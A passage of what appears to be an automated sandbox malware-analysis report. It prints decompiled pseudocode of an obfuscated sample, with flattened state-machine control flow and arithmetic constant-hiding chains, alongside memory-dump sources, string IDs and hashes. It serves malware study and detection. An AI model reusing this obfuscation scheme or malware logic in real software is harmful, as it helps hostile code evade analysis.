                                                      				_v596 = 0xe25b;
                                                      				_v596 = _v596 >> 4;
                                                      				_v596 = _v596 ^ 0x000030c3;
                                                      				_v636 = 0xc7ea;
                                                      				_v636 = _v636 << 0xa;
                                                      				_v636 = _v636 | 0x82c54243;
                                                      				_v636 = _v636 ^ 0x83dfaf9b;
                                                      				_v620 = 0x2a3e;
                                                      				_v620 = _v620 + 0xffff612f;
                                                      				_v620 = _v620 ^ 0xffffe842;
                                                      				_v644 = 0x52e;
                                                      				_t264 = 0x44;
                                                      				_v644 = _v644 * 0x2b;
                                                      				_v644 = _v644 + 0x1b45;
                                                      				_v644 = _v644 ^ 0x0000a38b;
                                                      				_v664 = 0x7c05;
                                                      				_v664 = _v664 / _t264;
                                                      				_v664 = _v664 + 0xfffff3de;
                                                      				_t265 = 0xd;
                                                      				_v664 = _v664 * 0x41;
                                                      				_v664 = _v664 ^ 0xfffd1fed;
                                                      				_v672 = 0x7153;
                                                      				_v672 = _v672 * 0x55;
                                                      				_v672 = _v672 + 0xffff3073;
                                                      				_v672 = _v672 | 0x19b2f735;
                                                      				_v672 = _v672 ^ 0x19b69e67;
                                                      				_v624 = 0x6a46;
                                                      				_v624 = _v624 << 6;
                                                      				_v624 = _v624 ^ 0x001a8e62;
                                                      				_v676 = 0x6586;
                                                      				_v676 = _v676 | 0x5a6bf539;
                                                      				_v676 = _v676 / _t265;
                                                      				_v676 = _v676 << 0xf;
                                                      				_v676 = _v676 ^ 0x4e5fab63;
                                                      				_v632 = 0x1a9f;
                                                      				_v632 = _v632 + 0x62a3;
                                                      				_v632 = _v632 ^ 0x000002a8;
                                                      				_v616 = 0x8464;
                                                      				_v616 = _v616 | 0x13bf265e;
                                                      				_v616 = _v616 ^ 0x13bfdd6d;
                                                      				_v592 = 0xbadb;
                                                      				_t266 = 0x3d;
                                                      				_t292 = _v632;
                                                      				_v592 = _v592 * 0x69;
                                                      				_v592 = _v592 ^ 0x004cce95;
                                                      				_v604 = 0xca90;
                                                      				_v604 = _v604 >> 0xc;
                                                      				_v604 = _v604 ^ 0x00007684;
                                                      				_v648 = 0x358b;
                                                      				_v648 = _v648 << 1;
                                                      				_v648 = _v648 << 9;
                                                      				_v648 = _v648 / _t266;
                                                      				_v648 = _v648 ^ 0x0003f328;
                                                      				_v600 = 0xe7dd;
                                                      				_v600 = _v600 ^ 0xaf509c9e;
                                                      				_v600 = _v600 ^ 0xaf5010b9;
                                                      				_v628 = 0xd224;
                                                      				_t245 = _v628;
                                                      				_t267 = 0x19;
                                                      				_t290 = _t245 % _t267;
                                                      				_v628 = _t245 / _t267;
                                                      				_v628 = _v628 ^ 0x00000864;
                                                      				do {
                                                      					while(_t293 != 0x47bbe06) {
                                                      						if(_t293 == 0xa25cde4) {
                                                      							_t249 = E0023F46D();
                                                      							_t298 = _v588 - _v548;
                                                      							asm("sbb ecx, [esp+0x94]");
                                                      							__eflags = _v584 - _t290;
                                                      							if(__eflags >= 0) {
                                                      								if(__eflags > 0) {
                                                      									L19:
                                                      									_t256 = 1;
                                                      									__eflags = 1;
                                                      								} else {
                                                      									__eflags = _t298 - _t249;
                                                      									if(_t298 >= _t249) {
                                                      										goto L19;
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							if(_t293 == 0x13363d5d) {
                                                      								_t290 = _v604;
                                                      								_t267 = _v592;
                                                      								E0024AAAE(_t267, _t290, _v648,  &_v588, _v600);
                                                      								_t300 =  &(_t300[3]);
                                                      								_t293 = 0xa25cde4;
                                                      								continue;
                                                      							} else {
                                                      								if(_t293 == 0x1fdc46de) {
                                                      									_t290 = _v660;
                                                      									_t254 = E0023B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
                                                      									_t292 = _t254;
                                                      									_t300 =  &(_t300[0xc]);
                                                      									__eflags = _t254 - 0xffffffff;
                                                      									if(__eflags != 0) {
                                                      										_t293 = 0x47bbe06;
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									if(_t293 == 0x350fffd6) {
                                                      										_t290 =  &_v524;
                                                      										_t255 = E00243E3F(_t267, _t290, __eflags, _v652, _v608);
                                                      										_pop(_t267);
                                                      										__eflags = _t255;
                                                      										if(__eflags != 0) {
                                                      											_t293 = 0x1fdc46de;
                                                      											continue;
                                                      										}
                                                      									} else {
                                                      										if(_t293 != 0x3b419076) {
                                                      											goto L14;
                                                      										} else {
                                                      											_t293 = 0x350fffd6;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L20:
                                                      						return _t256;
                                                      					}
                                                      					_push(_t267);
                                                      					_t247 = E00237F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
                                                      					_t290 = _v616;
                                                      					_t267 = _v632;
                                                      					asm("sbb esi, esi");
                                                      					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
                                                      					__eflags = _t293;
                                                      					E00244F7D(_t267, _t290, _t292); // executed
                                                      					_t300 =  &(_t300[7]);
                                                      					L14:
                                                      					__eflags = _t293 - 0x2fc5a10a;
                                                      				} while (__eflags != 0);
                                                      				goto L20;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #,'$#$Fj$Sq$[$u^
                                                      • API String ID: 0-3347335214
                                                      • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                                      • Instruction ID: f82053fcdca83c1f7aaa8d7c4eec6ba2f78566a670e4129313a4909c3cb049fd
                                                      • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                                      • Instruction Fuzzy Hash: DEB153725183819FE358CF64C88940BFBE2FBC4758F108A1DF1865A2A0D7B59A59CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E0023EE78() {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				intOrPtr _v1044;
                                                      				intOrPtr _v1048;
                                                      				intOrPtr _v1052;
                                                      				intOrPtr _v1056;
                                                      				signed int _v1060;
                                                      				signed int _v1064;
                                                      				signed int _v1068;
                                                      				signed int _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				signed int _v1084;
                                                      				signed int _v1088;
                                                      				signed int _v1092;
                                                      				signed int _v1096;
                                                      				signed int _v1100;
                                                      				signed int _v1104;
                                                      				signed int _v1108;
                                                      				signed int _v1112;
                                                      				signed int _v1116;
                                                      				signed int _v1120;
                                                      				signed int _v1124;
                                                      				void* _t204;
                                                      				void* _t216;
                                                      				void* _t218;
                                                      				intOrPtr _t242;
                                                      				intOrPtr _t248;
                                                      				signed int _t249;
                                                      				signed int _t250;
                                                      				signed int _t251;
                                                      				signed int _t252;
                                                      				signed int _t253;
                                                      				signed int _t254;
                                                      				signed int* _t257;
                                                      
                                                      				_t257 =  &_v1124;
                                                      				_v1056 = 0x181c5d;
                                                      				_v1052 = 0x367784;
                                                      				_t216 = 0x1144238d;
                                                      				_v1048 = 0x4ffcf6;
                                                      				_t248 = 0;
                                                      				_v1044 = 0;
                                                      				_v1088 = 0xda27;
                                                      				_t249 = 0x62;
                                                      				_v1088 = _v1088 * 0x3a;
                                                      				_t250 = 0x7a;
                                                      				_v1088 = _v1088 / _t249;
                                                      				_v1088 = _v1088 ^ 0x0000d2a1;
                                                      				_v1112 = 0x1719;
                                                      				_v1112 = _v1112 << 7;
                                                      				_v1112 = _v1112 + 0xffff2bf1;
                                                      				_v1112 = _v1112 | 0x98c770ba;
                                                      				_v1112 = _v1112 ^ 0x98cfba04;
                                                      				_v1096 = 0xeee5;
                                                      				_v1096 = _v1096 ^ 0xe08a058d;
                                                      				_v1096 = _v1096 | 0xf31efd60;
                                                      				_v1096 = _v1096 >> 0xd;
                                                      				_v1096 = _v1096 ^ 0x00079e87;
                                                      				_v1068 = 0x925f;
                                                      				_v1068 = _v1068 + 0xa627;
                                                      				_v1068 = _v1068 * 0xc;
                                                      				_v1068 = _v1068 ^ 0x000ee055;
                                                      				_v1076 = 0x1457;
                                                      				_v1076 = _v1076 * 0x3c;
                                                      				_t251 = 0x32;
                                                      				_v1076 = _v1076 / _t250;
                                                      				_v1076 = _v1076 ^ 0x00007f2a;
                                                      				_v1064 = 0x70c;
                                                      				_v1064 = _v1064 * 3;
                                                      				_v1064 = _v1064 ^ 0x000033a7;
                                                      				_v1080 = 0xbf13;
                                                      				_v1080 = _v1080 >> 0xf;
                                                      				_v1080 = _v1080 | 0xa6e1d279;
                                                      				_v1080 = _v1080 ^ 0xa6e18774;
                                                      				_v1072 = 0x855;
                                                      				_v1072 = _v1072 >> 6;
                                                      				_v1072 = _v1072 * 0x6d;
                                                      				_v1072 = _v1072 ^ 0x00004ced;
                                                      				_v1060 = 0x8e6f;
                                                      				_v1060 = _v1060 + 0xe76;
                                                      				_v1060 = _v1060 ^ 0x0000eeed;
                                                      				_v1116 = 0x7f13;
                                                      				_v1116 = _v1116 + 0x7bf9;
                                                      				_v1116 = _v1116 + 0xffffe522;
                                                      				_v1116 = _v1116 + 0x76b9;
                                                      				_v1116 = _v1116 ^ 0x000120a7;
                                                      				_v1124 = 0x4a8d;
                                                      				_v1124 = _v1124 + 0xb0fa;
                                                      				_t252 = 0x18;
                                                      				_v1124 = _v1124 / _t251;
                                                      				_v1124 = _v1124 ^ 0xe1689f92;
                                                      				_v1124 = _v1124 ^ 0xe168b829;
                                                      				_v1104 = 0x6fdc;
                                                      				_v1104 = _v1104 / _t252;
                                                      				_v1104 = _v1104 ^ 0xd1a01b12;
                                                      				_v1104 = _v1104 >> 0xd;
                                                      				_v1104 = _v1104 ^ 0x0006b7bc;
                                                      				_v1120 = 0x3441;
                                                      				_v1120 = _v1120 << 2;
                                                      				_v1120 = _v1120 | 0xb521b1d3;
                                                      				_v1120 = _v1120 ^ 0x6f352f49;
                                                      				_v1120 = _v1120 ^ 0xda14a570;
                                                      				_v1092 = 0xdaef;
                                                      				_v1092 = _v1092 + 0xffffef8f;
                                                      				_v1092 = _v1092 | 0x558b4159;
                                                      				_v1092 = _v1092 >> 0xb;
                                                      				_v1092 = _v1092 ^ 0x000a96bc;
                                                      				_v1084 = 0x9e65;
                                                      				_v1084 = _v1084 ^ 0xd37ef8f9;
                                                      				_t253 = 0x14;
                                                      				_v1084 = _v1084 / _t253;
                                                      				_v1084 = _v1084 ^ 0x0a9307fe;
                                                      				_v1100 = 0x36e3;
                                                      				_v1100 = _v1100 + 0xffff4219;
                                                      				_v1100 = _v1100 | 0x679c7357;
                                                      				_t254 = 0x3e;
                                                      				_v1100 = _v1100 * 0x7e;
                                                      				_v1100 = _v1100 ^ 0xffbf63c1;
                                                      				_v1108 = 0x25e;
                                                      				_v1108 = _v1108 / _t254;
                                                      				_v1108 = _v1108 | 0x82073b90;
                                                      				_v1108 = _v1108 * 0x30;
                                                      				_v1108 = _v1108 ^ 0x615b4461;
                                                      				do {
                                                      					while(_t216 != 0x295ca1) {
                                                      						if(_t216 == 0x1144238d) {
                                                      							_t216 = 0x274f9b22;
                                                      							continue;
                                                      						} else {
                                                      							if(_t216 == 0x1718f041) {
                                                      								E0023C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
                                                      							} else {
                                                      								if(_t216 == 0x274f9b22) {
                                                      									E00243E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
                                                      									_t216 = 0x295ca1;
                                                      									continue;
                                                      								} else {
                                                      									_t264 = _t216 - 0x3691f983;
                                                      									if(_t216 != 0x3691f983) {
                                                      										goto L10;
                                                      									} else {
                                                      										_push( &_v1040);
                                                      										_push( &_v520);
                                                      										E00237B63(_v1104, _v1120, _t264);
                                                      										_t248 =  !=  ? 1 : _t248;
                                                      										_t216 = 0x1718f041;
                                                      										continue;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L13:
                                                      						return _t248;
                                                      					}
                                                      					_push(_v1068);
                                                      					_t204 = E0024889D(0x24c9b0, _v1096, __eflags);
                                                      					_pop(_t218);
                                                      					_t242 =  *0x24ca2c; // 0x698300
                                                      					_t176 = _t242 + 0x230; // 0x7a0043
                                                      					E0023C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x24ca2c, _t204,  &_v1040);
                                                      					E00242025(_v1060, _t204, _v1116, _v1124);
                                                      					_t257 =  &(_t257[9]);
                                                      					_t216 = 0x3691f983;
                                                      					L10:
                                                      					__eflags = _t216 - 0x16e30c37;
                                                      				} while (__eflags != 0);
                                                      				goto L13;
                                                      			}







































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I/5o$aD[a$6$L
                                                      • API String ID: 0-1330720659
                                                      • Opcode ID: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
                                                      • Instruction ID: 2ef0a91d5a3fb8927a85014ae927d1be3af4e63ecd67e72e2ca2b4789b7b0513
                                                      • Opcode Fuzzy Hash: aa7f7d47efb36781e9dd6983fc65c55bd4f6dde0006c4e698a03cff8df4d7e47
                                                      • Instruction Fuzzy Hash: C19131B15183419FD358CF25D58941BFBF6BBC4358F10892EF19A9A260D3B98A19CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00237B63(void* __ecx, void* __edx, void* __eflags) {
                                                      				void* _t227;
                                                      				signed int _t253;
                                                      				signed int _t257;
                                                      				signed int _t258;
                                                      				void* _t279;
                                                      				void* _t280;
                                                      
                                                      				_t279 = _t280 - 0x70;
                                                      				_push( *((intOrPtr*)(_t279 + 0x7c)));
                                                      				_push( *((intOrPtr*)(_t279 + 0x78)));
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t227);
                                                      				 *(_t279 + 0x5c) = 0x4f49;
                                                      				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
                                                      				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
                                                      				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
                                                      				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
                                                      				 *(_t279 + 0x20) = 0x2d3b;
                                                      				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
                                                      				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
                                                      				 *(_t279 + 0x38) = 0xada;
                                                      				_t257 = 0x56;
                                                      				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
                                                      				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
                                                      				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
                                                      				 *(_t279 + 0x44) = 0x9fd0;
                                                      				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
                                                      				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
                                                      				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
                                                      				 *(_t279 + 0x28) = 0xbdd8;
                                                      				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
                                                      				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
                                                      				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
                                                      				 *(_t279 + 0x24) = 0xa469;
                                                      				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
                                                      				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
                                                      				 *(_t279 + 0x48) = 0xdd17;
                                                      				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
                                                      				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
                                                      				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
                                                      				 *(_t279 + 0x3c) = 0x840;
                                                      				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
                                                      				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
                                                      				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
                                                      				 *(_t279 + 0x34) = 0xe245;
                                                      				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
                                                      				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
                                                      				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
                                                      				 *(_t279 + 0x68) = 0x7c59;
                                                      				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
                                                      				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
                                                      				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
                                                      				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
                                                      				 *(_t279 + 0x1c) = 0x17b0;
                                                      				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
                                                      				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
                                                      				 *(_t279 + 0xc) = 0x52de;
                                                      				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
                                                      				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
                                                      				 *(_t279 + 0x14) = 0xa04a;
                                                      				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
                                                      				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
                                                      				 *(_t279 + 0x10) = 0x88b9;
                                                      				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
                                                      				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
                                                      				 *(_t279 + 0x58) = 0x8451;
                                                      				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
                                                      				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
                                                      				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
                                                      				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
                                                      				 *(_t279 + 0x2c) = 0xa221;
                                                      				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
                                                      				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
                                                      				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
                                                      				 *(_t279 + 0x6c) = 0xb834;
                                                      				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
                                                      				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
                                                      				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
                                                      				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
                                                      				 *(_t279 + 0x60) = 0x6d71;
                                                      				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
                                                      				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
                                                      				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
                                                      				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
                                                      				 *(_t279 + 0x40) = 0xcc9d;
                                                      				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
                                                      				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
                                                      				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
                                                      				 *(_t279 + 0x50) = 0xea3;
                                                      				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
                                                      				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
                                                      				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
                                                      				 *(_t279 + 0x64) = 0xe156;
                                                      				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
                                                      				_t258 = 0x77;
                                                      				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
                                                      				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
                                                      				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
                                                      				 *(_t279 + 0x54) = 0xb949;
                                                      				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
                                                      				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
                                                      				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
                                                      				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
                                                      				 *(_t279 + 0x4c) = 0x8c7e;
                                                      				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
                                                      				_t171 = _t279 - 0x14; // 0x68cf93e9
                                                      				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
                                                      				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
                                                      				 *(_t279 + 0x30) = 0x8a4e;
                                                      				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
                                                      				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
                                                      				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
                                                      				 *(_t279 + 0x18) = 0x537b;
                                                      				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
                                                      				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
                                                      				E002493A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
                                                      				_t193 = _t279 - 0x21c; // 0x68cf91e1
                                                      				E002493A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
                                                      				_t198 = _t279 - 0x424; // 0x68cf8fd9
                                                      				E002493A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
                                                      				_t202 = _t279 - 0x21c; // 0x68cf91e1
                                                      				E00236636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
                                                      				_t208 = _t279 - 0x424; // 0x68cf8fd9
                                                      				E00236636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
                                                      				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
                                                      				_t214 = _t279 - 0x14; // 0x68cf93e9
                                                      				_t215 = _t279 - 0x21c; // 0x68cf91e1
                                                      				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
                                                      				_t217 = _t279 - 0x424; // 0x68cf8fd9
                                                      				 *((intOrPtr*)(_t279 - 8)) = _t217;
                                                      				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
                                                      				_t253 = E00247BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
                                                      				asm("sbb eax, eax");
                                                      				return  ~_t253 + 1;
                                                      			}









                                                      0x00237db4
                                                      0x00237db7
                                                      0x00237dbe
                                                      0x00237dc9
                                                      0x00237dcc
                                                      0x00237dcf
                                                      0x00237dd3
                                                      0x00237dda
                                                      0x00237de1
                                                      0x00237de5
                                                      0x00237dec
                                                      0x00237df3
                                                      0x00237dfa
                                                      0x00237dfe
                                                      0x00237e14
                                                      0x00237e21
                                                      0x00237e32
                                                      0x00237e3a
                                                      0x00237e4b
                                                      0x00237e53
                                                      0x00237e65
                                                      0x00237e6d
                                                      0x00237e7c
                                                      0x00237e84
                                                      0x00237e87
                                                      0x00237e8a
                                                      0x00237e90
                                                      0x00237e93
                                                      0x00237e99
                                                      0x00237ea5
                                                      0x00237eb2
                                                      0x00237ebc
                                                      0x00237ec4

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID: 6S5q$f''e
                                                      • API String ID: 3080627654-2864536462
                                                      • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                                      • Instruction ID: 93ea29863e2991b4071ee83a6b47056cd45020bb154e315fc6b5f52d9e169b23
                                                      • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                                      • Instruction Fuzzy Hash: 9EA1CFB140134D9BEF59CF61C9898CE3BB5BF04358F508119FD2A962A0D3BAD959CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E0023B41F(signed int __edx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _t91;
                                                      				signed int* _t93;
                                                      				intOrPtr _t95;
                                                      				signed int _t103;
                                                      				signed int _t104;
                                                      
                                                      				_v44 = _v44 & 0x00000000;
                                                      				_v48 = 0x783c80;
                                                      				_v8 = 0x978d;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 | 0x918d7e28;
                                                      				_v8 = _v8 ^ 0x918d7bef;
                                                      				_v28 = 0x8ae6;
                                                      				_v28 = _v28 + 0xffff2048;
                                                      				_v28 = _v28 ^ 0xfffff0f4;
                                                      				_v40 = 0x90b0;
                                                      				_v40 = _v40 + 0x186c;
                                                      				_v40 = _v40 ^ 0x0000e60c;
                                                      				_v12 = 0x4bc7;
                                                      				_t103 = __edx;
                                                      				_v12 = _v12 * 0x77;
                                                      				_v12 = _v12 >> 8;
                                                      				_v12 = _v12 << 3;
                                                      				_v12 = _v12 ^ 0x000165a0;
                                                      				_v36 = 0x87ea;
                                                      				_v36 = _v36 | 0x75974cd4;
                                                      				_v36 = _v36 ^ 0x75979443;
                                                      				_v32 = 0x7f4c;
                                                      				_v32 = _v32 ^ 0x8971dc13;
                                                      				_v32 = _v32 ^ 0x89718547;
                                                      				_v24 = 0xd36b;
                                                      				_t104 = 0x3c;
                                                      				_v24 = _v24 * 9;
                                                      				_v24 = _v24 << 1;
                                                      				_v24 = _v24 >> 5;
                                                      				_v24 = _v24 ^ 0x000045e9;
                                                      				_v20 = 0xf34d;
                                                      				_v20 = _v20 + 0x5309;
                                                      				_v20 = _v20 << 0xa;
                                                      				_v20 = _v20 | 0x23e3e3ea;
                                                      				_v20 = _v20 ^ 0x27fbee67;
                                                      				_v16 = 0xef72;
                                                      				_v16 = _v16 * 0x55;
                                                      				_v16 = _v16 << 0x10;
                                                      				_v16 = _v16 / _t104;
                                                      				_v16 = _v16 ^ 0x0225d37d;
                                                      				_push(_v28);
                                                      				_t91 = E00231000(_v40, _v12, _v36, _v32, E0024889D(_t93, _v8, _v16));
                                                      				_t95 =  *0x24ca28; // 0x683138
                                                      				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
                                                      				return E00242025(_v24, _t90, _v20, _v16);
                                                      			}




















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: 81h$#
                                                      • API String ID: 1029625771-3526793653
                                                      • Opcode ID: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
                                                      • Instruction ID: 421291b48f5595a3ab998cd674b33172bfb53483b9bc83e09fbfcd0e7c04ad23
                                                      • Opcode Fuzzy Hash: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
                                                      • Instruction Fuzzy Hash: 2241EF71C0121AEBDF08CFA5C94A4EEFBB1FB54318F208599D411B62A4D7B90B58CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0023568E(void* __ecx, void* __edx) {
                                                      				void* _t188;
                                                      				void* _t209;
                                                      				void* _t210;
                                                      				signed int _t215;
                                                      				signed int _t216;
                                                      				signed int _t217;
                                                      				signed int _t218;
                                                      				signed int _t219;
                                                      				intOrPtr _t242;
                                                      				void* _t245;
                                                      				void* _t248;
                                                      				void* _t249;
                                                      
